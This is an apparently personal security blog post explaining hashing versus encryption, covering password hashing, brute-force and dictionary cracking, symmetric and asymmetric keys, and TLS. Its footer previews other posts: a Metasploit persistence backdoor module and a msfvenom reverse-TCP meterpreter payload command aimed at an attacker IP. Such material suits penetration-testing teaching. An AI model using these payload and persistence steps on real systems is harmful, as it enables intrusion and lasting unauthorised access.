Hashing vs Encryption

-

            Hashing vs Encryption (cyber edition)

Hashing : 

So what is hashing ? and why do we use it ? hasing is nothing but .....




Not in a mood to introduce this way today 🤔

firstly let’s understand how passwords are stored on servers . Whenever we create an account by claiming a username and password , the password is not stored in the form of clear text on the server , rather the password is put into a process and a set of  meaningless or random looking characters are derived from it which is called as hash and the process is called hashing . The generated hash is sent to the server and it stores them .  Actually the hash that is generated or the so called random text derived out of the password isn’t random at all , it comes out to be same every time if the same password is entered (remeber the word same password ) , if a different password is entered a different hash is generated . So When we try to login , the hashed version of the entered password is compared against the hashed version of the password stored on the server while creating the account . And if both of them match we are good to go and if they didn't match it means that you have entered the wrong password . So Why humans make everything complex ? why not simply let the server store the password as it is and let us in by checking the password we entered ?! . Isn't thanos sometimes right ?



To clear all of your doubts we shall take a step deeper into the concept .

Definition of hasing  : 



Not going say that I am never going to share the one liner but yes at the end of the blog which should make complete sense when you read it rather than sharing it at the first place and moving on with half knowledge.

So let's take a deep dive practically !

For instance I have opened a file and entered a text ‘IcanCoutTo6’ and the hash of it comes out to be 729E41B00C36AC5AB45BA8C68590357B no matter how many times you send the text to this process It always comes out to be the same , there are many algorithms to produce hash some of them are SHA1,SHA256,SHA512,MD4,MD5. I have created a file and saved the text “IcanCountTo6”  Fig:1.0 .

Fig  : 1.0



Now open powershell and Enter the following command :

Get-FileHash –Path PathOfTheFile –Algorithm MD5

Yes here we are using MD5 algorithm but you can any algorithm you wish , refer Fig:1.2 

Fig : 1.2


If you are unable to specify the path of the file , then you could use properties on the file you created and copy the path and paste it here. And you could see the same hash every single time. And don’t worry you might get different hash and there’s nothing wrong about it coz a single character (extra or less) or a space inbetween , or even the case sensitivity  can lead to a whole different hash and it might also depend on your system if it’s 32 or 64 bit . The persistence of the hash is all you have to look at .Most importantly No matter what we do we cannot get back the original text out of the hash unlike in case of encryption we can decrypt it and get the original text back (will come to it soon).The length of the hash is always same irrespective of the length of the text  Fig : 1.3 . 

Fig : 1.3


 


Now we have a great understanding about hashes , now let us understand what is the whole point of storing hashes of the text instead of storing the plain text itself , For an instance let’s say that you have a Company and your server had some vulnerabilities which lead a hacker to access all the employees usernames and  passwords .So what if they are in plain text ? Game Over Kaboom! and meanwhile the hacker : 


The hacker could login or even the change the passwords of our accounts before we take action , well what if its in the form of hash  ?  Guess what ? it makes hard for the hacker to crack the hash , well you might think that just before we have learned that no matter what we do we could get the original text out of it . yes you are right but here we are not trying to get the original text out of the hashed password but instead we can use bruteforce method where in we will be converting a series of text into hash and then comparing it with the hash that we had . well why am I telling all this ?! coz this is cyber edition !! ,  if they match we got the password but the time to get the furitful outcome  depends on the factors like hashing algorithm , password complexity and the cpu power so keeping that in mind let's take an example shall we 

Example : 

Let’s say that we had a list of texts like :
1) password                                                                                                                                                   
2) 123456
3) hellohello
4) araara

This is the hash of the text we wanted to find out :  

2ca8b65468b2cc1b8403e77f6c3fc70b939c097b16cc345964dd0e00bbd7eafb  

Now we will make hashes out of all these plain texts and compare it with the hash we had
password ->  hashfunction()  -> 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
123456     ->  hashfunction()  -> 8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92
hellohello -> hashfunction()   -> 0a86050fb37a4def36885da9557f5b22a9e191767a80e7a4a2415410a4462b68
araara       -> hashfunction()   -> 2ca8b65468b2cc1b8403e77f6c3fc70b939c097b16cc345964dd0e00bbd7eafb

And now we can see that hash of araara matches with the hash we had which means araara is the password !! .

Note : Unlike bruteforce method there are rainbow tables and dictionary attack as well where in rainbow tables are just large file that has list of commanly used passwords mapped with their hash so that one can just for the hash and get the plain text password. And in dictionary attack we provide a file which contains a list of well known passwords so their hash is calculated and compared with the hash we wanted to find out. 

Many people confuse between Bruteforce and Dictionary attack . Well you might have already if am not wrong , and you are not alone 😁 . Let me explain my ....





The difference between Bruteforce attack and dictionary attack is that when we need to perform a Dictionary attack we need to mention a file which contains a list of strings as a reference so that the strings in the file mentioned are converted into hash and compared , Whereas in Bruteforce attack each combination of letters symbols are converted into hash and then compared with the hashpassword.You
might have already guessed that there are downsides for all the three . For rainbow tables and dictionary attack we might not find out the plain text password as only common passwords were  mapped or present in the file where in bruteforce attack you will get to crack the password .





But 


Who knows ?! I might take you a year to crack it or even decades ! 



Sorry to make you feel disappointed but you won't forget the concept this way . Everything I do is for you benifit bestu frendo......😤😁

When using Bruteforcing attack so if  user uses simple password it is easy to crack , but if they use strong complex passwords  it takes a lot of time and when I say a lot of time I really mean it as I said . Meanwhile company can warn their employes to change their passwords . We can use the tool john the ripper to crack the hashes Which we will see in my later blogs .

Some Use Cases : 

  • We store hashed passwords on the server side as we have discussed before
  • When we let a client download a file we also display the hash of the file so that when the client downloads a file he can make the hash out of it and compare it will the hash provided by the vendor . This ensures integrity .

Now the Definition : 

Hashing is a method of cryptography that converts any form of data into a unique string of text. Any piece of data can be hashed, no matter its size or type. In traditional hashing, regardless of the data’s size, type, or length, the hash that any data produces is always the same length. A hash is designed to act as a one-way function — you can put data into a hashing algorithm and get a unique string, but if you come upon a new hash, you cannot decipher the input data it represents. A unique piece of data will always produce the same hash.

Encryption : 

Encryption is the process used to make information unreadable to avoid unauthorized disclosure. In a line “It supports Confidentiality”.

There are two types of encryption method : 
  • Symmetric key encryption
  • Asymmetric key encryption

Symmetric key encryption  :

Symmetric Encryption makes a text unreadable using a key and we could only get the original text back by decrypting it with the same key we had encrypted it . Let me show you how real life is this 


Well don't judge me !! that's the best gif I can find on the internet as of now. 

Anyway , that's what Symmetric key encryption is !! using the same key to encrypt and decrypt.

                          
                      Encryption                                                                                       decryption
ReadableText  ------>   3Q80yygIcMrldynBI6HQAvUHBuHbDSlgjijRduvRHbw=  ------> ReadbleText 
                        key A                                                                                                     key A

also refer Fig : 1.4

Fig : 1.4





First of all using the word key and learning that a key is something that does the encryption and decryption and not having a minimum level of idea about the key sucks let me give you a little idea about what is a key and how does the whole mechanism work with an example.

Example : 

You and your girlfriend wants to share messages in the class


What ? its just an example don't be nosy ok . 😒

 You and your girlfriend wants to share messages in the class and you wanted your friends to pass that cause you both aren’t on the same bench but you don’t want your friends to read the message as well  so you both wanted to share messages in a way that only you both could understand the message when you look at it and if others look at the message it seems like some kind of rubbish , so you both met secretly and shared a representation and the representation is : 

A denotes 01
B denotes 02 
C denotes 03 and so on ….

So If you wanted to send a message “Hello” to your girlfriend next time it will be sent as  “0805121215“ ( know as Encrypted form) and no one in the middle doesn’t know what it means and when it reaches your girlfriend she decrypts the message using the reference and this reference is known as key . Well this is the simplest form of encryption I picked up for understanding purposes , the algorithms that are used are very complex and the example is no where near to it .

Some real world symmetric key encryption algorithms are : 

  • AES (advance encryption standard)
  • Twofish
  • Serpent
  • DES  (data encryption standard)

AES is the most used algorithm

This is easy to implement  and takes minimal operational overhead compared to Asymmetric key encryption (up next in the blog). But if the mechanism uses the same key to encrypt and decrypt, the key must be passed to the computer on the other side as well , If you share the message openly anyone can see the key and  that’s a problem like if you pass the key to the students they can see it and understand the encrypted messages and change it according to their wish as well which compromises the confidentiality  but in the above example they met secretly and shared the key but we talk to random people over the internet who are on the other end on the map. So sharing the key  is impossible . But this is implemented in real life but not the way we have discussed , want to know how ? read the blog till the end !! . 



Well just kidding we just need to cover Asymmetric key encryption as well to understand how we use symmetric key encryption in real world . 

Advantages of Symmetric key encryption : 

  • Computation is faster then Asymmetric key encryption (discussed later)
  • As it is easy to Compute it is efficient for large data 

Disadvantages of Symmetric key encryption : 

  • Hard to transport the shared key (well this doesn’t prevent us at all from using it as said before read till the end !)

Asymmetric key encryption : 

This is where things get very interesting , In this algorithm every machine has a pair of keys and one of those keys is treated as private key  and the other is treated as public key . As the name suggests private key is not shared with anyone it is only known to the machine and whereas the public key can be shared publicly . The real speciality of these keys is if one key encrypts the data it could  be decrypted by the other key and vise-versa, they are mathematically linked with each other and finding the private key from public key is not possible . In real world public key is used to encrypt the data and the private key is used to decrypt the data  Fig : 1.5. 

Fig : 1.5


So let’s say computer Bob wants to communicate with computer Alice , So firstly both of you will share their public keys to each other. And then if you(Bob) wanted to send a message to Alice then you are going to encrypt the message using the public key of Alice and send it to Alice and then Alice uses his private key to decrypt the data , as simply as that .Even if the attacker captures the public key of Alice he couldn’t decrypt the message sent by Bob cause he needs the private key of Alice .

Advantages of Asymmetric key encryption : 

  • Public key can be shared  (as long as the private is not shared)
  • Designed for small data  eg : ssh

Disadvantages of Asymmetric key encryption : 

  •   Slow (As this is complex mathematically it takes time to compute)
  •    Inefficient for large data

So how can Symmetric key be shared ?

well Firstly we use Asymmetric key encryption method to initiate the communication . Instead of transferring the data using Asymmetric encryption we transfer the symmetric key how cool is that !! And that’s how TLS works.

Note : This is one of the ways symmetric key can be shared.

Summary :

Hashing is a one-way function where data is mapped to a fixed-length value. Hashing is primarily used for authentication.Encryption is a two-way function where information is scrambled in such a way that it can be unscrambled later . Encryption is of two different types , Symmetric and Asymmetric key encryption . Data can be encrypted and decrypted using the same key in Symmetric key encryption whereas in Asymmetric we use a pair of keys where one is used to encrypt and the other is used to decrypt. We use Asymmetric key encryption to share the Symmetric key and continue using the Symmetric key encryption method from then on .We encrypt the data expecting that we want the original text back some time . We hash the data to check it over the previously taken hash of the same data , if we get the same hash it means that the data hasn’t been changed from then else there is a change in the data or it is also used to verify the passwords if the generated hash by the computer and the hash stored over the server matches we are authenticated.

So is that all !! you are leaving ? Ok just give me a fist bump  !!



                                               Farewell

Comments

Post a Comment

Popular posts from this blog

Learning Nmap Host Discovery with iptables and Wireshark Analysis

-
Image
Learning Nmap Host Discovery with Iptables  and Wireshark Analysis Finally the wait is no longer , we are going to learn host discovery using nmap in a very detailed way. Well you might say that there are many videos and blogs out there what is special about this one ? , In this blog I will be sharing my knowledge after going through several videos , nmap book and many other blogs in the most detailed way possible , well you will see the difference after going through the blog . When I say I really mean it . Heads up !! you must know basis of iptables before going through the blog  and you might ask why ? coz we not just learning just by saying that nmap blocks the packets so this host discovery isn't going to work.  we are going to block the packets and run the discovery again and bypass the our rules ourselves that how this blog is designed very thing is practical practical and practical . How cool is that ?!. well I wrote blog on iptables just for you !! click here an...
Read more

Persistence Techniques with Metasploit - Part 6

-
Image
     Persistence Techniques with Metasploit Getting a shell in real world requries a lot of hardwork and research , All this work put in so that we will be ok to loose the session when the user logs off or turns the computer off ? Hell no ! , we need to make our connection persistance so that we can get back alive when the computer's on or when the user logs in. And we will be taking a look into the post module section which helps us to make our connection persistence after exploiting the target machine. Note : For creating a persistence backdoor you should have already compromised the target machine and have the meterpreter shell  Pov : you have already exploited the target machine and had a meterpreter shell Commands :  use exploit/windows/local/persistence_exe show options Fig : 1.1 In Fig : 1.1 we can see the different options availabe REXENAME option defines the name of the exe file the module is going to put on the remote system REXEPATH denotes the local ...
Read more

Generating Payloads using Msfvenom - Metasploit Part 5

-
Image
Generating and encoding Payloads using  Msfvenom Well aparantely msfvenom is a seperate tool from msfconsole which is used to generate payloads but it doesn't mean that we cannot create payloads using msfconsole but the advantage of using msfvenom is that there is no need for us to be in the msfconsole to generate payloads but no worries we will be covering both the methods :) So let's hop onto it shall we ! Command : msfvenom --list Fig : 1.1 In Fig : 1.1 we can see using the command we can list a brief instructions on how to use different options with it To list different types of modules we can use Command : msfvenom --list [modules] eg:payloads Fig : 1.2 In Fig : 1.2 we can see the different types of available payloads we can use with msfvenom and obviously it is going to take a while when you execute the command to load loads of payloads Let's create a meterpreter staged payload Command : msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port_number -...
Read more